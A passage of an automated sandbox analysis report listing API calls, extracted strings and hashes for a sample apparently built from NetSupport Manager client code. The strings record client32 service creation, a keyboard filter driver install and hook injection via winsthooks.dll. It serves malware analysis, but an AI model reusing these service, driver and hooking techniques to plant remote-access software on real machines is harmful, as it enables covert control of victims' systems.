                                                                                                                          • Part of subcall function 00B15120: WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSI264F.tmp,000000FF,?,00000104,00B699F4,00000000), ref: 00B151E4
                                                                                                                          • Part of subcall function 00B15120: _strrchr.LIBCMT ref: 00B151F3
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 00B15AD6
                                                                                                                        • WaitForSingleObject.KERNEL32(?,00000000), ref: 00B15AEC
                                                                                                                        • ResetEvent.KERNEL32(?), ref: 00B15B08
                                                                                                                        • SetEvent.KERNEL32(?), ref: 00B15B30
                                                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,?,00000000,000000FF), ref: 00B15B3F
                                                                                                                        • Sleep.KERNEL32(0000AFC8), ref: 00B15B59
                                                                                                                        • GetCurrentProcess.KERNEL32(000000FE), ref: 00B15B64
                                                                                                                        • TerminateProcess.KERNEL32(00000000), ref: 00B15B6B
                                                                                                                          • Part of subcall function 00B155B0: GetTickCount.KERNEL32 ref: 00B15618
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ProcessWait$CurrentEventMultipleObjects$ByteCharCountFileModuleMultiNameObjectResetSingleSleepTerminateTickWide_strrchr
                                                                                                                        • String ID: MiniDump
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32,GetLongPathNameW), ref: 00B256E4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B256EB
                                                                                                                        • GetLongPathNameW.KERNELBASE(?,?,00000104), ref: 00B256FC
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleLongModuleNamePathProc
                                                                                                                        • String ID: GetLongPathNameW$kernel32
                                                                                                                        APIs
                                                                                                                        • GetCurrentProcess.KERNEL32 ref: 00B1513C
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\Installer\MSI264F.tmp,00000104), ref: 00B1515A
                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,C:\Windows\Installer\MSI264F.tmp,000000FF,?,00000104,00B699F4,00000000), ref: 00B151E4
                                                                                                                        • _strrchr.LIBCMT ref: 00B151F3
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: ByteCharCurrentFileModuleMultiNameProcessWide_strrchr
                                                                                                                        • String ID: C:\Windows\Installer\MSI264F.tmp
                                                                                                                        APIs
                                                                                                                        • SetEvent.KERNEL32(00000200), ref: 00B15BC4
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,00000032), ref: 00B15BE0
                                                                                                                        • CloseHandle.KERNELBASE(00000200), ref: 00B15BFC
                                                                                                                        • CloseHandle.KERNEL32(00000208), ref: 00B15C10
                                                                                                                        • CloseHandle.KERNEL32 ref: 00B15C19
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandle$EventObjectSingleWait
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • SetCurrentDirectoryW.KERNELBASE(C:\Windows\Installer\), ref: 00B26230
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: CurrentDirectory
                                                                                                                        • String ID: C:\Windows\Installer\$NSW.LIC$longpath=%s
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: _wcschr
                                                                                                                        • String ID: Command Line: %s$\
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B097D0: _malloc.LIBCMT ref: 00B097E9
                                                                                                                          • Part of subcall function 00B097D0: wsprintfW.USER32 ref: 00B09804
                                                                                                                          • Part of subcall function 00B097D0: _memset.LIBCMT ref: 00B09827
                                                                                                                        • std::exception::exception.LIBCMT ref: 00B67F7E
                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00B67F93
                                                                                                                        • LoadLibraryW.KERNELBASE(psapi.dll,?,00B7F7C0,?), ref: 00B67FA5
                                                                                                                        Strings
                                                                                                                        Similarity
                                                                                                                        • API ID: Exception@8LibraryLoadThrow_malloc_memsetstd::exception::exceptionwsprintf
                                                                                                                        • String ID: psapi.dll
                                                                                                                        APIs
                                                                                                                        • DeleteFileW.KERNELBASE(?,?,00B34C9F,?,?,?,?,?), ref: 00B3D0A4
                                                                                                                        • GetLastError.KERNEL32(?,00B34C9F,?,?,?,?,?), ref: 00B3D0AE
                                                                                                                        • __dosmaperr.LIBCMT ref: 00B3D0BD
                                                                                                                        Similarity
                                                                                                                        • API ID: DeleteErrorFileLast__dosmaperr
                                                                                                                        • String ID:
                                                                                                                        APIs
                                                                                                                        • ___crtCorExitProcess.LIBCMT ref: 00B3C954
                                                                                                                          • Part of subcall function 00B3C921: GetModuleHandleW.KERNEL32(mscoree.dll,?,00B3C959,?,?,00B4925A,000000FF,0000001E,00B836B0,0000000C,00B49305,?,?,?,00B42AA8,0000000D), ref: 00B3C92B
                                                                                                                          • Part of subcall function 00B3C921: GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00B3C93B
                                                                                                                        • ExitProcess.KERNEL32 ref: 00B3C95D
                                                                                                                        Similarity
                                                                                                                        • API ID: ExitProcess$AddressHandleModuleProc___crt
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2427264223-0
                                                                                                                        • Opcode ID: aaacfdbd33b1efad5a0812152e61f570ff86441c0f832008854e1d0029d7bd65
                                                                                                                        • Instruction ID: 7682604c175cf255ff582d44997cf9ff2ad0ba25d415287a7e883a46c013caeb
                                                                                                                        • Opcode Fuzzy Hash: aaacfdbd33b1efad5a0812152e61f570ff86441c0f832008854e1d0029d7bd65
                                                                                                                        • Instruction Fuzzy Hash: 00B09B3100410C7BCB012F51DC098493F59EB40760B514010F40405171DF72DD929684
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __waccess_s
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 4272103461-0
                                                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                        • Instruction ID: 03bad38e1e7188183fbfca2d67db6e2e7d4f8902a2228c5d6f25ab2e094ede50
                                                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                                                        • Instruction Fuzzy Hash: C5C09B3305414D7F5F196DE5EC05C553F59D6C0770B204155F91C89491DD32D5515640
                                                                                                                        APIs
                                                                                                                        • _doexit.LIBCMT ref: 00B3CC2D
                                                                                                                          • Part of subcall function 00B3CAE1: __lock.LIBCMT ref: 00B3CAEF
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(00B82FA8,00000020,00B3CC48,?,00000001,00000000,?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D), ref: 00B3CB2B
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB3C
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(-00000004,?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB62
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB75
                                                                                                                          • Part of subcall function 00B3CAE1: DecodePointer.KERNEL32(?,00B3CC88,000000FF,?,00B49311,00000011,?,?,00B42AA8,0000000D,?,00B097EE), ref: 00B3CB7F
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: DecodePointer$__lock_doexit
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3343572566-0
                                                                                                                        • Opcode ID: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                                        • Instruction ID: 280afcc5c10ba3d85a08b98c0ba9d7e802b238d0ed40642599d5d3c34f8bc453
                                                                                                                        • Opcode Fuzzy Hash: b7f9ddcf0c01e83a82a0f1c6c29853ea6c7db7599a0eb0d3eddd439c3244ce42
                                                                                                                        • Instruction Fuzzy Hash: F8B0927258020C33DA202596AC03F067E4987C0B60E640060BA0C291A2AAA3A96181D9
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: __wfsopen
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 197181222-0
                                                                                                                        • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                        • Instruction ID: 0f08709ada09159de0c0611695fab746f69baedc58aa4186be2f18921080584d
                                                                                                                        • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                                                                                                                        • Instruction Fuzzy Hash: A5C09B7244410C77CF111D82DC02E593F599BC0760F144050FB1C191619573D5619585
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,00000000,00000000,?,00B00BEF,?,00B09820,?,00000000,?,00B00C46,?,00B09820,?,00000000), ref: 00B0015C
                                                                                                                        • _strrchr.LIBCMT ref: 00B0016F
                                                                                                                        • _strrchr.LIBCMT ref: 00B001A5
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B001D9
                                                                                                                        • GetTickCount.KERNEL32 ref: 00B00204
                                                                                                                        • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00B00228
                                                                                                                        • TranslateMessage.USER32(?), ref: 00B00231
                                                                                                                        • DispatchMessageW.USER32(?), ref: 00B0023A
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B00267
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B0026A
                                                                                                                        • wsprintfW.USER32 ref: 00B0027F
                                                                                                                        • wsprintfW.USER32 ref: 00B002AE
                                                                                                                        • GetCurrentProcess.KERNEL32(?,?,?,?,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B002CF
                                                                                                                        • GetProcessTimes.KERNEL32(00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B002D6
                                                                                                                        • GetSystemTimeAsFileTime.KERNEL32(?,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B002EB
                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00B00312
                                                                                                                        • wsprintfW.USER32 ref: 00B00395
                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00430
                                                                                                                        • GetGuiResources.USER32(00000000,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B00437
                                                                                                                        • wsprintfW.USER32 ref: 00B0046D
                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00B00494
                                                                                                                        • wsprintfW.USER32 ref: 00B004A3
                                                                                                                        • OutputDebugStringW.KERNEL32(?,?,?,?,?,?,?,?,?,00B09820,?,..\CTL32\Refcount.cpp,00000546), ref: 00B004AF
                                                                                                                        • wsprintfW.USER32 ref: 00B004F7
                                                                                                                        • wsprintfW.USER32 ref: 00B00553
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,00B09820,?,..\CTL32\Refcount.cpp), ref: 00B00566
                                                                                                                        • wsprintfW.USER32 ref: 00B00602
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: wsprintf$Current$MessageProcessThread$CountFileTickTime_strrchr$DebugDispatchErrorLastModuleNameOutputResourcesStringSystemTimesTranslateUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                        • String ID: Call Stack:%s$Details in file:$...(more)$Callstack:$ $%04d-%02d-%02d %02d:%02d:%02d.%03d, Win%s %d.%d$%d.$%ud %02uh %02um %02us$, error code %u (x%x)$, gdiHandles=%d$, runTime=$, thread=%s$, tid=%u (x%x)$.err$.exe$00h$00m$05/12/23 12:20:03 V14.10$Assert, tid=%x thread=%s exp=%s @ %hs:%d$File %hs, line %d%s%sBuild: %hs (%.17hs)Expression: %s$NOT copied to disk$Support\$copied to %s
                                                                                                                        • API String ID: 2334632915-3631277593
                                                                                                                        • Opcode ID: 267ff33305a43b38b5e672097d2a671d75d735e082842d9d8f1e6a52753f01a7
                                                                                                                        • Instruction ID: 96eb8395d132cdfab9fac67e3c5371445ad9217e2514505930600713e540fadf
                                                                                                                        • Opcode Fuzzy Hash: 267ff33305a43b38b5e672097d2a671d75d735e082842d9d8f1e6a52753f01a7
                                                                                                                        • Instruction Fuzzy Hash: EB522871E002199BCB24EF64CD55BEA77F8EF58300F0485D5EA0AA72D0EBB59E44CB94
                                                                                                                        APIs
                                                                                                                        • GetClassNameW.USER32(?,?,00000080), ref: 00B30411
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • GetModuleHandleW.KERNEL32(user32.dll,GetWindowBand), ref: 00B30437
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B3043E
                                                                                                                        • SHGetFolderPathW.SHFOLDER(00000000,0000002B,00000000,00000000,?), ref: 00B3049B
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B30547
                                                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00B30560
                                                                                                                        • LoadLibraryW.KERNEL32(?), ref: 00B3059B
                                                                                                                        • GetProcAddress.KERNEL32(?,MySetHook), ref: 00B305CB
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressLibraryLoadModuleNameProcwsprintf$ClassFileFolderHandleLocalPathTime_mallocwvsprintf
                                                                                                                        • String ID: Found SM, SimulateWinKey (to dismiss)$GetWindowBand$HookForBlank(%x, %s, %x)$Injecting...$Loaded %s$MySetHook$MyUnhook$NSMBlank_%p$NSMViewPaused$Shell_TrayWnd$Software\NetSupport Ltd\winsthooks$Unhooking$UnloadDelay$Unloading %s$WaitSM$\NSL\$band=2$bound$nothing to do$user32.dll$winsthooks.dll
                                                                                                                        • API String ID: 2003708542-315793285
                                                                                                                        • Opcode ID: 5ac75b58abf2770826bafc254682a7e9a61fa5c339903c7702e28e551eb98b0d
                                                                                                                        • Instruction ID: 4eab3e22188e928dff1e48469a04107ca7839cf5f0947f113cb0b163b69cf983
                                                                                                                        • Opcode Fuzzy Hash: 5ac75b58abf2770826bafc254682a7e9a61fa5c339903c7702e28e551eb98b0d
                                                                                                                        • Instruction Fuzzy Hash: 3C1203B19103199BDB30AB64DC95BAA73F8EF44704F1041E4E60DA72D2EBB49E84CF65
                                                                                                                        APIs
                                                                                                                        • _memset.LIBCMT ref: 00B1A8BC
                                                                                                                        • GetVersionExW.KERNEL32(?), ref: 00B1A8D5
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo), ref: 00B1A900
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B1A909
                                                                                                                        • GetModuleHandleW.KERNEL32(kernel32.dll,GetProductInfo,Microsoft ), ref: 00B1AA1F
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 00B1AA22
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000001C.00000002.2540382455.0000000000AE1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00AE0000, based on PE: true
                                                                                                                        • Associated: 0000001C.00000002.2540347314.0000000000AE0000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540461187.0000000000B69000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B87000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540500336.0000000000B92000.00000004.00000001.01000000.0000000B.sdmp
                                                                                                                        • Associated: 0000001C.00000002.2540571511.0000000000B95000.00000002.00000001.01000000.0000000B.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_28_2_ae0000_MSI264F.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AddressHandleModuleProc$Version_memset
                                                                                                                        • String ID: (build %d)$, 32-bit$, 64-bit$Advanced Server$Business Edition$Cluster Server Edition$Compute Cluster Edition$Datacenter Edition$Datacenter Edition (core installation)$Datacenter Edition for Itanium-based Systems$Datacenter Server$Datacenter x64 Edition$Enterprise Edition$Enterprise Edition (core installation)$Enterprise Edition for Itanium-based Systems$Enterprise x64 Edition$GetNativeSystemInfo$GetProductInfo$Home Basic Edition$Home Edition$Home Premium Edition$Microsoft $Professional$Server$Small Business Server$Small Business Server Premium Edition$Standard Edition$Standard Edition (core installation)$Standard x64 Edition$Starter Edition$Ultimate Edition$Web Edition$Web Server Edition$Windows 10 $Windows 2000 $Windows 7 $Windows 8 $Windows 8.1 $Windows Home Server$Windows Server 2003 R2, $Windows Server 2003, $Windows Server 2008 $Windows Server 2008 R2 $Windows Server 2012 $Windows Server 2012 R2 $Windows Server 2016 $Windows Storage Server 2003$Windows Vista $Windows XP $Windows XP Professional x64 Edition$kernel32.dll
                                                                                                                        APIs
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B280FA
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2810C
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • OpenServiceW.ADVAPI32(00000000,00000000,000F01FF), ref: 00B28134
                                                                                                                        • GetLastError.KERNEL32 ref: 00B28146
                                                                                                                        • OpenServiceW.ADVAPI32(?,PCISys,000F0003), ref: 00B285BE
                                                                                                                        • GetLastError.KERNEL32 ref: 00B285CA
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2868E
                                                                                                                        • OpenSCManagerW.ADVAPI32(?,?,000F003F), ref: 00B286F5
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2876A
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLastOpen$Service$Manager$CloseHandleLoadStringwvsprintf
                                                                                                                        • String ID: /u /ex$Attempting to restart audio$Deleting %s$ImagePath$IsA()$PCISys$Remove Audio ret %d, e=%d$Remove nskbfltr ret %d$Removing nskblftr$SYSTEM\CurrentControlSet\Services\%s$\inv$\inv\$\inv\*.bin$e:\nsmsrc\nsm\1410\1410\nt\../ctl32/nsmstring.h$nskbfltr$restart audio ret %d
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F), ref: 00B2B389
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2B39B
                                                                                                                          • Part of subcall function 00B280C0: OpenSCManagerW.ADVAPI32(00000000,00000000,000F003F,5E06C67B), ref: 00B280FA
                                                                                                                          • Part of subcall function 00B280C0: GetLastError.KERNEL32 ref: 00B2810C
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B2B3E9
                                                                                                                        • wsprintfW.USER32 ref: 00B2B418
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B4C7
                                                                                                                        • OpenServiceW.ADVAPI32(?,00000000,000F0003), ref: 00B2B4E6
                                                                                                                        • QueryServiceConfigW.ADVAPI32(00000000,?,00000400,?), ref: 00B2B50A
                                                                                                                        • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000002,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00B2B53F
                                                                                                                        • CloseServiceHandle.ADVAPI32(00000000), ref: 00B2B557
                                                                                                                        • CreateServiceW.ADVAPI32(?,00000000,00000000,000F01FF,-000000FF,00000002,00000001,?,00000000,00000000,00000000,00000000,00000000), ref: 00B2B5BF
                                                                                                                        • GetLastError.KERNEL32 ref: 00B2B5CB
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B5F9
                                                                                                                          • Part of subcall function 00B2F5E0: LoadStringW.USER32(00AE0000,000003F9,?,00000100), ref: 00B2F60A
                                                                                                                          • Part of subcall function 00B2F5E0: wvsprintfW.USER32(?,?,00000000), ref: 00B2F622
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B617
                                                                                                                        • CloseServiceHandle.ADVAPI32(?), ref: 00B2B676
                                                                                                                        • GetSystemDirectoryW.KERNEL32(?,000000EE), ref: 00B2B71C
                                                                                                                        • OpenSCManagerW.ADVAPI32(?,?,000F003F), ref: 00B2B770
                                                                                                                        Similarity
                                                                                                                        • API ID: Service$CloseHandle$Open$ErrorLastManagerwsprintf$Configwvsprintf$ChangeCreateDirectoryLoadLocalQueryStringSystemTime_malloc
                                                                                                                        • String ID: "%s%s" /* $%s created ok$%s not created, already exists$/utc *$Attempting to restart audio$C:\Windows\Installer\$DisableDriver$ImagePath$Install Audio ret %d, e=%d$InstallService (showonly=%d, tutor=%d)$Installing %s$Installing nskbfltr ret %d$SYSTEM\CurrentControlSet\Services\nsafltr\Parameters$SYSTEM\CurrentControlSet\services\nskbfltr$\??\$\SystemRoot\system32\drivers\nskbfltr.sys$\drivers\nsafltr.sys$\drivers\nskbfltr.sys$client32 service re-enabled$existing client32 service is disabled$not creating client32, already installed$nskbfltr$restart audio ret %d
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00B2F030: GetLocalTime.KERNEL32(?,?,00000000,00000000), ref: 00B2F04D
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F09D
                                                                                                                          • Part of subcall function 00B2F030: wvsprintfW.USER32(?,?,00000000), ref: 00B2F0BE
                                                                                                                          • Part of subcall function 00B2F030: wsprintfW.USER32 ref: 00B2F0D3
                                                                                                                          • Part of subcall function 00B2F030: _malloc.LIBCMT ref: 00B2F0FC
                                                                                                                        • LoadLibraryW.KERNEL32(USER32), ref: 00AFF4FB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesW), ref: 00AFF518
                                                                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00AFF525
                                                                                                                        • _memset.LIBCMT ref: 00AFF54C
                                                                                                                        • EnumDisplaySettingsW.USER32(00000000,000000FF,?), ref: 00AFF56B
                                                                                                                        • _memset.LIBCMT ref: 00AFF595
